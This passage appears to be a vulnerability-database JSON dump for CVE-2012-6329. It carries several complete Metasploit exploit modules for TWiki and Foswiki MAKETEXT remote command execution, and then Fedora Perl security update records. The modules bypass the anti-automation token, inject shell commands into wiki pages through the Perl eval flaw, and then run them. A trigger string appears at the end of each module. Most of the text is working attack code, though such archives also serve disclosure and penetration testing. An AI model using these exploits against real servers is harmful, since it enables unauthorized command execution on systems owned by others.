\n'password' => password \n} \n}) \n \nif not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/ \nvprint_status \"#{res.code}\\n#{res.body}\" \nreturn nil \nend \n \nsession = $1 \nreturn session \nend \n \ndef inject_code(session, code) \n \nvprint_status(\"Retrieving the validation_key...\") \n \nres = send_request_cgi({ \n'uri' => \"#{@base}bin/edit#{@page}\", \n'cookie' => \"FOSWIKISID=#{session}\" \n}) \n \nif not res or res.code != 200 or res.body !~ /name='validation_key' value='\\?([0-9a-f]*)'/ \nvprint_error(\"Error retrieving the validation_key\") \nreturn nil \nend \n \nvalidation_key = $1 \nvprint_good(\"validation_key found: #{validation_key}\") \n \nif session.empty? \nif res.headers['Set-Cookie'] =~ /FOSWIKISID=([0-9a-f]*)/ \nsession = $1 \nelse \nvprint_error(\"Error using anonymous access\") \nreturn nil \nend \nend \n \nif res.headers['Set-Cookie'] =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/ \nstrike_one = $1 \nelse \nvprint_error(\"Error getting the FOSWIKISTRIKEONE value\") \nreturn nil \nend \n \n# Transforming validation_key in order to bypass foswiki antiautomation \nvalidation_key = Rex::Text.md5(validation_key + strike_one) \nvprint_status(\"Transformed validation key: #{validation_key}\") \nvprint_status(\"Injecting the payload...\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{@base}bin/save#{@page}\", \n'cookie' => \"FOSWIKISID=#{session}\", \n'vars_post' => \n{ \n'validation_key' => validation_key, \n'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\" \n} \n \n}) \n \nif not res or res.code != 302 or res.headers['Location'] !~ /bin\\/view#{@page}/ \nprint_warning(\"Error injecting the payload\") \nprint_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\" \nreturn nil \nend \n \nlocation = URI(res.headers['Location']).path \nprint_good(\"Payload injected on #{location}\") \n \nreturn location \nend \n \ndef check \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \nres = send_request_cgi({ \n'uri' => \"#{@base}System/WebHome\" \n}) \n \nif not res or res.code != 200 \nreturn Exploit::CheckCode::Unknown \nend \n \nif res.body =~ /This site is running Foswiki version.*Foswiki-(\\d\\.\\d\\.\\d)/ \nversion = $1 \nprint_status(\"Version found: #{version}\") \nif version <= \"1.1.6\" \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \nreturn Exploit::CheckCode::Detected \nend \n \n \ndef exploit \n \n# Init variables \n@page = '' \n \nif datastore['FoswikiPage'] and not datastore['FoswikiPage'].empty? \n@page << '/' if datastore['FoswikiPage'][0] != '/' \n@page << datastore['FoswikiPage'] \nelse \n@page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\" \nend \n \n@base = target_uri.path \n@base << '/' if @base[-1, 1] != '/' \n \n# Login if needed \nif (datastore['USERNAME'] and \nnot datastore['USERNAME'].empty? and \ndatastore['PASSWORD'] and \nnot datastore['PASSWORD'].empty?) \nprint_status(\"Trying login to get session ID...\") \nsession = do_login(datastore['USERNAME'], datastore['PASSWORD']) \nelse \nprint_status(\"Using anonymous access...\") \nsession = \"\" \nend \n \nif not session \nfail_with(Exploit::Failure::Unknown, \"Error getting a session ID\") \nend \n \n# Inject payload \nprint_status(\"Trying to inject the payload on #{@page}...\") \nres = inject_code(session, payload.encoded) \nif not res or res !~ /#{@page}/ \nfail_with(Exploit::Failure::Unknown, \"Error injecting the payload\") \nend \n \n# Execute payload \nprint_status(\"Executing the payload through #{@page}...\") \nres = send_request_cgi({ \n'uri' => \"#{@base}#{@page}\", \n'cookie' => \"FOSWIKISID=#{session}\" \n}) \nif not res or res.code != 200 or res.body !~ /HASH/ \nprint_status(\"#{res.code}\\n#{res.body}\") \nfail_with(Exploit::Failure::Unknown, \"Error executing the payload\") \nend \n \nprint_good(\"Exploitation was successful\") \n \nend \n \nend \n \n=begin \n \n* Trigger: \n \n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}% \n \n=end \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119055/foswiki_maketext.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T17:47:37", "description": "No description provided by source.", "published": "2012-12-25T00:00:00", "title": "TWiki MAKETEXT Remote Command Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2012-12-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60534", "id": "SSV:60534", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'TWiki MAKETEXT Remote Command Execution',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\r\n specially crafted MAKETEXT, a malicious user can execute shell commands since user\r\n input is passed to the Perl "eval" command without first being sanitized. The\r\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\r\n module. This works in TWiki sites that have user interface localization enabled\r\n (UserInterfaceInternationalisation variable set).\r\n \r\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\r\n if the 'TwikiPage' option isn't provided, the module will try to create a random\r\n page on the SandBox space. The modules has been tested successfully on\r\n TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\r\n },\r\n 'Author' =>\r\n [\r\n 'George Clark', # original discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-6329' ],\r\n [ 'OSVDB', '88460' ],\r\n [ 'BID', '56950' ],\r\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]\r\n ],\r\n 'Privileged' => false, # web server context\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 1024,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic ruby python bash telnet'\r\n }\r\n },\r\n 'Platform' => [ 'unix' ],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [[ 'Automatic', { }]],\r\n 'DisclosureDate' => 'Dec 15 2012',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, "TWiki base path", "/" ]),\r\n OptString.new('TwikiPage', [ false, "TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)" ]),\r\n OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]),\r\n OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ])\r\n ], self.class)\r\n end\r\n \r\n def do_login(username, password)\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => "#{@base}do/login",\r\n 'vars_post' =>\r\n {\r\n 'username' => username,\r\n 'password' => password\r\n }\r\n })\r\n \r\n if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /TWIKISID=([0-9a-f]*)/\r\n return nil\r\n end\r\n \r\n session = $1\r\n return session\r\n end\r\n \r\n def inject_code(session, code)\r\n \r\n vprint_status("Retrieving the crypttoken...")\r\n \r\n res = send_request_cgi({\r\n 'uri' => "#{@base}do/edit#{@page}",\r\n 'cookie' => "TWIKISID=#{session}",\r\n 'vars_get' =>\r\n {\r\n 'nowysiwyg' => '1'\r\n }\r\n })\r\n \r\n if not res or res.code != 200 or res.body !~ /name="crypttoken" value="([0-9a-f]*)"/\r\n vprint_error("Error retrieving the crypttoken")\r\n return nil\r\n end\r\n \r\n crypttoken = $1\r\n vprint_good("crypttoken found: #{crypttoken}")\r\n \r\n if session.empty?\r\n if res.headers['Set-Cookie'] =~ /TWIKISID=([0-9a-f]*)/\r\n session = $1\r\n else\r\n vprint_error("Error using anonymous access")\r\n return nil\r\n end\r\n end\r\n \r\n vprint_status("Injecting the payload...")\r\n \r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => "#{@base}do/save#{@page}",\r\n 'cookie' => "TWIKISID=#{session}",\r\n 'vars_post' =>\r\n {\r\n 'crypttoken' => crypttoken,\r\n 'text' => "#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\" args=\\"#{rand_text_alpha(3 + rand(3))}\\"}%"\r\n }\r\n })\r\n \r\n if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/\r\n print_warning("Error injecting the payload")\r\n print_status "#{res.code}\\n#{res.body}\\n#{res.headers['Location']}"\r\n return nil\r\n end\r\n \r\n location = URI(res.headers['Location']).path\r\n print_good("Payload injected on #{location}")\r\n \r\n return location\r\n end\r\n \r\n def check\r\n @base = target_uri.path\r\n @base << '/' if @base[-1, 1] != '/'\r\n \r\n res = send_request_cgi({\r\n 'uri' => "#{@base}do/view/TWiki/WebHome"\r\n })\r\n \r\n if not res or res.code != 200\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n if res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/\r\n version = $1\r\n print_status("Version found: #{version}")\r\n if version < "5.1.3"\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n return Exploit::CheckCode::Detected\r\n end\r\n \r\n \r\n def exploit\r\n \r\n # Init variables\r\n @page = ''\r\n \r\n if datastore['TwikiPage'] and not datastore['TwikiPage'].empty?\r\n @page << '/' if datastore['TwikiPage'][0] != '/'\r\n @page << datastore['TwikiPage']\r\n else\r\n @page << "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}"\r\n end\r\n \r\n @base = target_uri.path\r\n @base << '/' if @base[-1, 1] != '/'\r\n \r\n # Login if needed\r\n if (datastore['USERNAME'] and\r\n not datastore['USERNAME'].empty? and\r\n datastore['PASSWORD'] and\r\n not datastore['PASSWORD'].empty?)\r\n print_status("Trying login to get session ID...")\r\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\r\n else\r\n print_status("Using anonymous access...")\r\n session = ""\r\n end\r\n \r\n if not session\r\n fail_with(Exploit::Failure::Unknown, "Error getting a session ID")\r\n end\r\n \r\n # Inject payload\r\n print_status("Trying to inject the payload on #{@page}...")\r\n res = inject_code(session, payload.encoded)\r\n if not res\r\n fail_with(Exploit::Failure::Unknown, "Error injecting the payload")\r\n end\r\n \r\n # Execute payload\r\n print_status("Executing the payload through #{res}...")\r\n res = send_request_cgi({\r\n 'uri' => res,\r\n 'cookie' => "TWIKISID=#{session}"\r\n })\r\n if not res or res.code != 200 or res.body !~ /HASH/\r\n fail_with(Exploit::Failure::Unknown, "Error executing the payload")\r\n end\r\n \r\n print_good("Exploitation was successful")\r\n \r\n end\r\n \r\nend\r\n \r\n=begin\r\n \r\n* Trigger:\r\n \r\n%MAKETEXT{"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #" args="msf"}%\r\n \r\n=end\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-60534"}], "metasploit": [{"lastseen": "2020-10-12T23:26:48", "description": "This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a specially crafted MAKETEXT, a malicious user can execute shell commands since user input is passed to the Perl \"eval\" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. This works in TWiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set). If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the 'TwikiPage' option isn't provided, the module will try to create a random page on the SandBox space. The module has been tested successfully on TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\n", "published": "2012-12-21T10:30:04", "type": "metasploit", "title": "TWiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/TWIKI_MAKETEXT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TWiki MAKETEXT Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\n specially crafted MAKETEXT, a malicious user can execute shell commands since user\n input is passed to the Perl \"eval\" command without first being sanitized. The\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\n module. This works in TWiki sites that have user interface localization enabled\n (UserInterfaceInternationalisation variable set).\n\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\n if the 'TwikiPage' option isn't provided, the module will try to create a random\n page on the SandBox space. The module has been tested successfully on\n TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\n },\n 'Author' =>\n [\n 'George Clark', # original discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-6329' ],\n [ 'OSVDB', '88460' ],\n [ 'BID', '56950' ],\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]\n ],\n 'Privileged' => false, # web server context\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 1024,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic ruby python telnet'\n }\n },\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => '2012-12-15',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"TWiki base path\", \"/\" ]),\n OptString.new('TwikiPage', [ false, \"TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\n OptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\n OptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\n ])\n end\n\n def post_auth?\n true\n end\n\n def do_login(username, password)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}do/login\",\n 'vars_post' =>\n {\n 'username' => username,\n 'password' => password\n }\n })\n\n if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/\n return nil\n end\n\n session = $1\n return session\n end\n\n def inject_code(session, code)\n\n vprint_status(\"Retrieving the crypttoken...\")\n\n res = send_request_cgi({\n 'uri' => \"#{@base}do/edit#{@page}\",\n 'cookie' => \"TWIKISID=#{session}\",\n 'vars_get' =>\n {\n 'nowysiwyg' => '1'\n }\n })\n\n if not res or res.code != 200 or res.body !~ /name=\"crypttoken\" value=\"([0-9a-f]*)\"/\n vprint_error(\"Error retrieving the crypttoken\")\n return nil\n end\n\n crypttoken = $1\n vprint_good(\"crypttoken found: #{crypttoken}\")\n\n if session.empty?\n if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/\n session = $1\n else\n vprint_error(\"Error using anonymous access\")\n return nil\n end\n end\n\n vprint_status(\"Injecting the payload...\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}do/save#{@page}\",\n 'cookie' => \"TWIKISID=#{session}\",\n 'vars_post' =>\n {\n 'crypttoken' => crypttoken,\n 'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\n }\n })\n\n if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/\n print_warning(\"Error injecting the payload\")\n print_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\n return nil\n end\n\n location = URI(res.headers['Location']).path\n print_good(\"Payload injected on #{location}\")\n\n return location\n end\n\n def check\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n res = send_request_cgi({\n 'uri' => \"#{@base}do/view/TWiki/WebHome\"\n })\n\n if not res or res.code != 200\n return Exploit::CheckCode::Unknown\n end\n\n if res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/\n version = $1\n vprint_status(\"Version found: #{version}\")\n if version < \"5.1.3\"\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Detected\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def exploit\n\n # Init variables\n @page = ''\n\n if datastore['TwikiPage'] and not datastore['TwikiPage'].empty?\n @page << '/' if datastore['TwikiPage'][0] != '/'\n @page << datastore['TwikiPage']\n else\n @page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\n end\n\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n # Login if needed\n if (datastore['USERNAME'] and\n not datastore['USERNAME'].empty? and\n datastore['PASSWORD'] and\n not datastore['PASSWORD'].empty?)\n print_status(\"Trying login to get session ID...\")\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\n else\n print_status(\"Using anonymous access...\")\n session = \"\"\n end\n\n if not session\n fail_with(Failure::Unknown, \"Error getting a session ID\")\n end\n\n # Inject payload\n print_status(\"Trying to inject the payload on #{@page}...\")\n res = inject_code(session, payload.encoded)\n if not res\n fail_with(Failure::Unknown, \"Error injecting the payload\")\n end\n\n # Execute payload\n print_status(\"Executing the payload through #{res}...\")\n res = send_request_cgi({\n 'uri' => res,\n 'cookie' => \"TWIKISID=#{session}\"\n })\n if not res or res.code != 200 or res.body !~ /HASH/\n fail_with(Failure::Unknown, \"Error executing the payload\")\n end\n\n print_good(\"Exploitation was successful\")\n\n end\nend\n\n=begin\n\n* Trigger:\n\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\n\n=end\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/twiki_maketext.rb"}, {"lastseen": "2020-10-12T23:25:07", "description": "This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using a specially crafted MAKETEXT, a malicious user can execute shell commands since the input is passed to the Perl \"eval\" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. Only Foswiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set) are vulnerable. If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the FoswikiPage option isn't provided, the module will try to create a random page on the SandBox space. The modules has been tested successfully on Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.\n", "published": "2012-12-21T21:08:08", "type": "metasploit", "title": "Foswiki MAKETEXT Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6329", "CVE-2012-6330"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/FOSWIKI_MAKETEXT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Foswiki MAKETEXT Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using\n a specially crafted MAKETEXT, a malicious user can execute shell commands since the\n input is passed to the Perl \"eval\" command without first being sanitized. The\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\n module. Only Foswiki sites that have user interface localization enabled\n (UserInterfaceInternationalisation variable set) are vulnerable.\n\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried.\n Also, if the FoswikiPage option isn't provided, the module will try to create a\n random page on the SandBox space. The modules has been tested successfully on\n Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.\n },\n 'Author' =>\n [\n 'Brian Carlson', # original discovery in Perl Locale::Maketext\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-6329' ],\n [ 'OSVDB', '88410' ],\n [ 'URL', 'http://foswiki.org/Support/SecurityAlert-CVE-2012-6330' ]\n ],\n 'Privileged' => false, # web server context\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 1024,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic ruby python telnet'\n }\n },\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Foswiki 1.1.5', { }]],\n 'DisclosureDate' => '2012-12-03',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Foswiki base path\", \"/\" ]),\n OptString.new('FoswikiPage', [ false, \"Foswiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\n OptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\n OptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\n ])\n end\n\n def post_auth?\n true\n end\n\n def default_cred?\n true\n end\n\n def do_login(username, password)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}bin/login\",\n 'vars_post' =>\n {\n 'username' => username,\n 'password' => password\n }\n })\n\n if not res or res.code != 302 or res.get_cookies !~ /FOSWIKISID=([0-9a-f]*)/\n vprint_status \"#{res.code}\\n#{res.body}\"\n return nil\n end\n\n session = $1\n return session\n end\n\n def inject_code(session, code)\n\n vprint_status(\"Retrieving the validation_key...\")\n\n res = send_request_cgi({\n 'uri' => \"#{@base}bin/edit#{@page}\",\n 'cookie' => \"FOSWIKISID=#{session}\"\n })\n\n if not res or res.code != 200 or res.body !~ /name='validation_key' value='\\?([0-9a-f]*)'/\n vprint_error(\"Error retrieving the validation_key\")\n return nil\n end\n\n validation_key = $1\n vprint_good(\"validation_key found: #{validation_key}\")\n\n if session.empty?\n if res.get_cookies =~ /FOSWIKISID=([0-9a-f]*)/\n session = $1\n else\n vprint_error(\"Error using anonymous access\")\n return nil\n end\n end\n\n if res.get_cookies =~ /FOSWIKISTRIKEONE=([0-9a-f]*)/\n strike_one = $1\n else\n vprint_error(\"Error getting the FOSWIKISTRIKEONE value\")\n return nil\n end\n\n # Transforming validation_key in order to bypass foswiki antiautomation\n validation_key = Rex::Text.md5(validation_key + strike_one)\n vprint_status(\"Transformed validation key: #{validation_key}\")\n vprint_status(\"Injecting the payload...\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}bin/save#{@page}\",\n 'cookie' => \"FOSWIKISID=#{session}\",\n 'vars_post' =>\n {\n 'validation_key' => validation_key,\n 'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\n }\n\n })\n\n if not res or res.code != 302 or res.headers['Location'] !~ /bin\\/view#{@page}/\n print_warning(\"Error injecting the payload\")\n print_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\n return nil\n end\n\n location = URI(res.headers['Location']).path\n print_good(\"Payload injected on #{location}\")\n\n return location\n end\n\n def check\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n res = send_request_cgi({\n 'uri' => \"#{@base}System/WebHome\"\n })\n\n if not res or res.code != 200\n return Exploit::CheckCode::Unknown\n end\n\n if res.body =~ /This site is running Foswiki version.*Foswiki-(\\d\\.\\d\\.\\d)/\n version = $1\n print_status(\"Version found: #{version}\")\n if version <= \"1.1.6\"\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Detected\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def exploit\n\n # Init variables\n @page = ''\n\n if datastore['FoswikiPage'] and not datastore['FoswikiPage'].empty?\n @page << '/' if datastore['FoswikiPage'][0] != '/'\n @page << datastore['FoswikiPage']\n else\n @page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\n end\n\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n # Login if needed\n if (datastore['USERNAME'] and\n not datastore['USERNAME'].empty? and\n datastore['PASSWORD'] and\n not datastore['PASSWORD'].empty?)\n print_status(\"Trying login to get session ID...\")\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\n else\n print_status(\"Using anonymous access...\")\n session = \"\"\n end\n\n if not session\n fail_with(Failure::Unknown, \"Error getting a session ID\")\n end\n\n # Inject payload\n print_status(\"Trying to inject the payload on #{@page}...\")\n res = inject_code(session, payload.encoded)\n if not res or res !~ /#{@page}/\n fail_with(Failure::Unknown, \"Error injecting the payload\")\n end\n\n # Execute payload\n print_status(\"Executing the payload through #{@page}...\")\n res = send_request_cgi({\n 'uri' => \"#{@base}#{@page}\",\n 'cookie' => \"FOSWIKISID=#{session}\"\n })\n if not res or res.code != 200 or res.body !~ /HASH/\n print_status(\"#{res.code}\\n#{res.body}\")\n fail_with(Failure::Unknown, \"Error executing the payload\")\n end\n\n print_good(\"Exploitation was successful\")\n\n end\nend\n\n=begin\n\n* Trigger:\n\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\n\n=end\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/foswiki_maketext.rb"}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-02-19T01:37:56", "published": "2013-02-19T01:37:56", "id": "FEDORA:942C320E6D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: perl-5.14.3-221.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-01-30T00:54:03", "published": "2013-01-30T00:54:03", "id": "FEDORA:D263821ACF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: perl-5.16.2-237.fc18", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2728", "CVE-2012-6329"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-01-24T21:54:55", "published": "2013-01-24T21:54:55", "id": "FEDORA:8065A20A8B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: perl-5.14.3-205.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329", "CVE-2013-1667"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl 